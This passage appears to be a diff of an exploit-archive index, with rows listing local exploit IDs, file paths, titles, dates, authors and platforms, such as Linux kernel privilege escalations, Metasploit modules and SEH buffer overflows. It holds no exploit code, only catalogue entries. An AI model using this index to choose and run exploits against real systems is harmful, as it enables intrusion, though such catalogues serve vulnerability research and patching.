+30237,exploits/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",local,hardware, +30244,exploits/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Bypass",2013-12-12,"Morteza Hashemi",local,windows, +30280,exploits/linux/local/30280.txt,"GFax 0.7.6 - Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",local,linux, +30295,exploits/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,local,multiple, +30393,exploits/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation (Metasploit)",2013-12-17,Metasploit,local,win_x86-64, +30392,exploits/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' Local Privilege Escalation (Metasploit)",2013-12-17,Metasploit,local,windows, +30336,exploits/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",local,windows, +30802,exploits/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Local Privilege Escalation",2007-11-24,SoBeIt,local,windows, +30374,exploits/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Local Stack Overflow",2013-12-17,"Arash Allebrahim",local,windows, +30399,exploits/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,local,aix, +40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows, +40522,exploits/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows, +30464,exploits/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Privilege Escalation",2007-08-09,"Robert N. M. Watson",local,linux, +30468,exploits/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",local,windows, +30474,exploits/multiple/local/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,local,multiple, +30477,exploits/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,local,windows, +30484,exploits/bsd/local/30484.txt,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",local,bsd, +30503,exploits/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Privilege Escalation",2007-08-16,forloop,local,linux, +30546,exploits/windows/local/30546.txt,"Microworld eScan (Multiple Products) - Local Privilege Escalation",2007-08-30,"Edi Strosar",local,windows, +30970,exploits/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",local,multiple, +30604,exploits/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Privilege Escalation",2007-09-21,"Wojciech Purczynski",local,linux, +30605,exploits/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,local,linux, +30620,exploits/linux/local/30620.txt,"Xen 3.0.3 - pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection",2007-09-22,"Joris van Rantwijk",local,linux, +30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String (PoC)",2014-01-03,LiquidWorm,local,multiple, +30680,exploits/windows/local/30680.txt,"Macrovision SafeDisc - 'SecDRV.SYS' Method_Neither Privilege Escalation",2007-10-18,"Elia Florio",local,windows, +30681,exploits/windows/local/30681.txt,"SpeedFan - 'Speedfan.sys' Local Privilege Escalation",2007-10-18,"Ruben Santamarta",local,windows, +30780,exploits/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",local,linux, +30788,exploits/windows/local/30788.rb,"IcoFX - Local Stack Buffer Overflow (Metasploit)",2014-01-07,Metasploit,local,windows, +30789,exploits/windows/local/30789.rb,"IBM Forms Viewer - Unicode Buffer Overflow (Metasploit)",2014-01-07,Metasploit,local,windows, +30839,exploits/linux/local/30839.c,"Zabbix 1.1.4/1.4.2 - 'daemon_start' Local Privilege Escalation",2007-12-03,"Bas van Schaik",local,linux, +30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows, +31036,exploits/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",local,windows, +31090,exploits/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",local,windows, +31151,exploits/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,local,linux, +31182,exploits/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",local,windows, +31346,exploits/linux/local/31346.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)",2014-02-02,saelo,local,linux, +31347,exploits/lin_x86-64/local/31347.c,"Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)",2014-02-02,rebel,local,lin_x86-64, +31386,exploits/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Local Buffer Overflow (SEH) (ASLR + DEP Bypass)",2014-02-04,"Muhamad Fadzil Ramli",local,windows, +31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,local,windows, +31524,exploits/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Local Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",local,windows, +31574,exploits/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation",2014-02-11,"Piotr Szerman",local,arm, +31576,exploits/windows/local/31576.rb,"Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit)",2014-02-11,Metasploit,local,windows, +31643,exploits/windows/local/31643.rb,"Easy CD-DA Recorder - '.pls' Local Buffer Overflow (Metasploit)",2014-02-13,Metasploit,local,windows, +31667,exploits/windows/local/31667.txt,"Microsoft Windows - 'SeImpersonatePrivilege' Local Privilege Escalation",2008-04-17,"Cesar Cerrudo",local,windows, +31688,exploits/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",local,windows, +31766,exploits/windows/local/31766.rb,"Audiotran - '.pls' Local Stack Buffer Overflow (Metasploit)",2014-02-19,Metasploit,local,windows, +31895,exploits/windows/local/31895.txt,"Notepad++ CCompletion Plugin 1.19 - Local Stack Buffer Overflow",2014-02-25,tishion,local,windows, +40350,exploits/windows/local/40350.py,"Apple iCloud Desktop Client 5.2.1.0 - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",local,windows, +31911,exploits/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",local,linux, +31930,exploits/windows/local/31930.txt,"No-IP DUC Client for Windows - Local Information Disclosure",2008-06-16,"Charalambous Glafkos",local,windows, +31937,exploits/php/local/31937.txt,"PHP 5.2.6 - 'chdir()' Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",local,php, +31940,exploits/osx/local/31940.txt,"Apple Mac OSX 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,local,osx, +31959,exploits/linux/local/31959.txt,"Perl - 'rmtree()' Function Local Insecure Permissions",2008-06-23,"Frans Pop",local,linux, +40349,exploits/win_x86-64/local/40349.py,"LogMeIn Client 1.3.2462 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",local,win_x86-64, +31972,exploits/windows/local/31972.py,"Gold MP4 Player 3.3 - Local Buffer Overflow (SEH)",2014-02-28,metacom,local,windows, +31988,exploits/windows/local/31988.rb,"Total Video Player 1.3.1 - 'Settings.ini' Local Buffer Overflow (SEH) (Metasploit)",2014-02-28,Metasploit,local,windows, +31991,exploits/windows/local/31991.rb,"VCDGear 3.50 - '.cue' Local Stack Buffer Overflow",2014-02-28,Provensec,local,windows, +32041,exploits/windows/local/32041.pl,"ALLPlayer 5.8.1 - '.m3u' Local Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",local,windows, +32050,exploits/windows/local/32050.py,"Calavera UpLoader 3.5 - Local Buffer Overflow (SEH)",2014-03-04,"Daniel la calavera",local,windows, +32055,exploits/multiple/local/32055.txt,"Netrw Vim Script - 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",local,multiple, +32074,exploits/windows/local/32074.rb,"ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)",2014-03-05,Metasploit,local,windows, +32152,exploits/windows/local/32152.py,"KMPlayer 3.8.0.117 - Local Buffer Overflow",2014-03-10,metacom,local,windows, +32153,exploits/qnx/local/32153.sh,"QNX 6.4.x/6.5.x ifwatchd - Local Privilege Escalation",2014-03-10,cenobyte,local,qnx, +32154,exploits/qnx/local/32154.c,"QNX 6.5.0 x86 io-graphics - Local Privilege Escalation",2014-03-10,cenobyte,local,qnx, +32155,exploits/qnx/local/32155.c,"QNX 6.5.0 x86 phfont - Local Privilege Escalation",2014-03-10,cenobyte,local,qnx, +32156,exploits/qnx/local/32156.txt,"QNX 6.4.x/6.5.x pppoectl - Information Disclosure",2014-03-10,cenobyte,local,qnx, +32158,exploits/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,local,windows, +32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,local,windows, +32261,exploits/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",local,windows, +32343,exploits/php/local/32343.php,"PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities",2008-09-08,Ciph3r,local,php, +32358,exploits/windows/local/32358.pl,"MP3Info 0.8.5a - Local Buffer Overflow (SEH)",2014-03-19,"Ayman Sagy",local,windows, +32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware, +32446,exploits/linux/local/32446.txt,"Xen 3.3 - XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",local,linux, +32501,exploits/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",local,multiple, +32572,exploits/windows/local/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Privilege Escalation",2008-11-07,alex,local,windows, +32585,exploits/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,local,windows, +32590,exploits/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",local,windows, +32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,local,php, +32700,exploits/linux/local/32700.rb,"ibstat $PATH - Local Privilege Escalation (Metasploit)",2014-04-04,Metasploit,local,linux, +32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows, +32751,exploits/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",local,lin_x86-64, +32752,exploits/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,local,windows, +32771,exploits/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation",2009-02-02,"Ruben Santamarta",local,windows, +32778,exploits/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,local,windows, +32793,exploits/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit)",2014-04-10,Metasploit,local,windows, +32805,exploits/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",local,linux, +32820,exploits/linux/local/32820.txt,"OpenSC 0.11.x - PKCS#11 Implementation Unauthorized Access",2009-02-26,"Andreas Jellinghaus",local,linux, +32813,exploits/osx/local/32813.c,"Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Local Privilege Escalation",2014-04-11,"Kenzley Alphonse",local,osx, +32829,exploits/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass",2009-03-02,"Chris Evans",local,linux, +32845,exploits/windows/local/32845.pl,"IBM System Director Agent 5.20 - CIM Server Privilege Escalation",2009-03-10,"Bernhard Mueller",local,windows, +32847,exploits/multiple/local/32847.txt,"PostgreSQL 8.3.6 - Low Cost Function Information Disclosure",2009-03-10,"Andres Freund",local,multiple, +32848,exploits/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Local Privilege Escalation",2009-03-10,"Sun Microsystems",local,linux, +32850,exploits/windows/local/32850.txt,"SlySoft (Multiple Products) - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",local,windows, +32884,exploits/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",local,android, +32891,exploits/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",local,windows, +32892,exploits/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",local,windows, +32893,exploits/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",local,windows, +32901,exploits/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' / 'open_basedir' Restriction Bypass",2009-04-10,"Maksymilian Arciemowicz",local,php, +32946,exploits/freebsd/local/32946.c,"FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",local,freebsd, +32947,exploits/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,local,linux, +33012,exploits/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,local,windows, +33028,exploits/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,local,linux, +33069,exploits/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,local,windows, +33145,exploits/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",local,linux, +33161,exploits/php/local/33161.php,"PHP 5.3 - 'mail.log' Configuration Option 'open_basedir' Restriction Bypass",2009-08-10,"Maksymilian Arciemowicz",local,php, +33213,exploits/win_x86/local/33213.rb,"Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit)",2014-05-06,Metasploit,local,win_x86, +33229,exploits/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Privilege Escalation",2009-09-16,"Tavis Ormandy",local,bsd, +33255,exploits/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",local,linux, +33321,exploits/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1)",2009-11-03,"teach & xipe",local,linux, +33322,exploits/linux/local/33322.c,"Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation (2)",2009-11-03,"teach & xipe",local,linux, +33593,exploits/windows/local/33593.c,"Microsoft Windows XP/Vista/2000/2003 - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",local,windows, +33336,exploits/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)",2013-02-24,SynQ,local,linux, +33360,exploits/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,local,windows, +33387,exploits/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",local,linux, +33395,exploits/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",local,linux, +40823,exploits/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,local,windows, +33508,exploits/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",local,linux, +33516,exploits/lin_x86-64/local/33516.c,"Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",local,lin_x86-64, +33572,exploits/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Local Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",local,unix, +33576,exploits/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation",2010-01-28,"Matthew Garrett",local,linux, +33589,exploits/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",local,lin_x86-64, +33523,exploits/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",local,linux, +33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux, +33614,exploits/linux/local/33614.c,"dbus-glib pam_fprintd - Local Privilege Escalation",2014-06-02,"Sebastian Krahmer",local,linux, +33623,exploits/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations",2010-02-10,"Tim Brown",local,linux, +33725,exploits/aix/local/33725.txt,"IBM AIX 6.1.8 - 'libodm' Arbitrary File Write",2014-06-12,Portcullis,local,aix, +40342,exploits/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",local,win_x86-64, +33791,exploits/arm/local/33791.rb,"Adobe Reader for Android < 11.2.0 - 'addJavascriptInterface' Local Overflow (Metasploit)",2014-06-17,Metasploit,local,arm, +33799,exploits/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",local,solaris, +33808,exploits/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",local,linux, +33824,exploits/linux/local/33824.c,"Linux Kernel 3.13 - SGID Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",local,linux, +33892,exploits/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,local,windows, +33893,exploits/windows/local/33893.rb,"Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit)",2014-06-27,Metasploit,local,windows, +33899,exploits/linux/local/33899.txt,"Chkrootkit 0.49 - Local Privilege Escalation",2014-06-28,"Thomas Stangner",local,linux, +33904,exploits/linux/local/33904.txt,"Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition",2014-06-28,"Dawid Golunski",local,linux, +33961,exploits/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,local,windows, +33963,exploits/linux/local/33963.txt,"gdomap - Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",local,linux, +34112,exploits/windows/local/34112.txt,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,local,windows, +34001,exploits/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",local,linux, +34037,exploits/win_x86/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Privilege Escalation",2014-07-12,LiquidWorm,local,win_x86, +40936,exploits/linux/local/40936.html,"Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution",2016-12-18,"Hacker Fantastic",local,linux, +34131,exploits/windows/local/34131.py,"Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,local,windows, +34134,exploits/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",local,lin_x86-64, +34167,exploits/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,local,win_x86, +34267,exploits/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation",2010-07-07,"Bartlomiej Balcerek",local,linux, +40917,exploits/windows/local/40917.py,"Nidesoft MP3 Converter 2.6.18 - Local Buffer Overflow (SEH)",2016-12-15,malwrforensics,local,windows, +34272,exploits/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Privilege Escalation",2014-08-05,"ryujin & sickness",local,windows, +34311,exploits/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",local,solaris, +34313,exploits/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",local,solaris, +34314,exploits/solaris/local/34314.sh,"Oracle Solaris Management Console - WBEM Insecure Temporary File Creation",2010-07-13,"Frank Stuart",local,solaris, +34333,exploits/windows/local/34333.rb,"Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Local Privilege Escalation (Metasploit)",2014-08-13,Metasploit,local,windows, +34331,exploits/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RET Buffer Overflow",2014-08-12,"Giovanni Bartolomucci",local,windows, +34421,exploits/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One",2014-08-27,"taviso & scarybeasts",local,linux, +34489,exploits/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,local,windows, +34512,exploits/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,local,windows, +34537,exploits/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",local,linux, +34648,exploits/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape (PoC)",2014-09-13,"Joxean Koret",local,windows, +34822,exploits/windows/local/34822.c,"Microsoft Windows - Local Procedure Call (LPC) Privilege Escalation",2010-09-07,yuange,local,windows, +34923,exploits/linux/local/34923.c,"Linux Kernel < 3.16.1 - 'Remount FUSE' Local Privilege Escalation",2014-10-09,"Andy Lutomirski",local,linux, +34921,exploits/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Local Stack Overflow",2014-10-07,"Amir Tavakolian",local,windows, +34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware, +34966,exploits/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation",2014-10-14,LiquidWorm,local,windows, +34967,exploits/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,local,windows, +34982,exploits/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Local Privilege Escalation (Metasploit)",2014-10-15,Metasploit,local,win_x86, +34987,exploits/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure",2010-11-09,"Dan Rosenberg",local,linux, +35010,exploits/ios/local/35010.txt,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,local,ios, +35019,exploits/windows/local/35019.py,"Microsoft Windows - OLE Package Manager SandWorm",2014-10-20,"Vlad Ovtchinikov",local,windows, +35020,exploits/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)",2014-10-20,Metasploit,local,win_x86, +35021,exploits/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,local,linux, +35040,exploits/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous",local,windows, +35074,exploits/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Local Buffer Overflow",2014-10-27,metacom,local,windows, +35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",local,windows, +35101,exploits/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,local,windows, +35112,exploits/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Local Privilege Escalation",2014-10-29,"Robert Jaroszuk",local,linux, +35161,exploits/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)",2012-01-12,zx2c4,local,linux, +35177,exploits/windows/local/35177.py,"i-FTP 2.20 - Local Buffer Overflow (SEH)",2014-11-06,metacom,local,windows, +35189,exploits/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,local,windows, +35216,exploits/windows/local/35216.py,"Microsoft Office 2007/2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",local,windows, +35234,exploits/linux/local/35234.py,"OSSEC 2.8 - 'hosts.deny' Local Privilege Escalation",2014-11-14,skynet-13,local,linux, +35235,exploits/windows/local/35235.rb,"Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)",2014-11-14,Metasploit,local,windows, +35236,exploits/windows/local/35236.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)",2014-11-14,Metasploit,local,windows, +35322,exploits/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,local,windows, +35370,exploits/linux/local/35370.c,"Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation",2014-11-25,"Kaiqu Chen",local,linux, +35377,exploits/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Local Buffer Overflow (SEH)",2014-11-26,"Muhamad Fadzil Ramli",local,windows, +35395,exploits/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",local,windows, +35423,exploits/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS 13.1.4 - Local Privilege Escalation",2014-12-02,"Information Paradox",local,windows, +35440,exploits/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation (Metasploit)",2014-12-02,Metasploit,local,osx, +35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",local,windows, +35450,exploits/linux/local/35450.txt,"VFU 4.10-1.1 - Local Buffer Overflow",2014-12-03,"Juan Sacco",local,linux, +35472,exploits/lin_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",local,lin_x86-64, +35488,exploits/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",local,osx, +35503,exploits/windows/local/35503.rb,"Advantech AdamView 4.30.003 - '.gni' Local Buffer Overflow (SEH)",2014-12-09,"Muhamad Fadzil Ramli",local,windows, 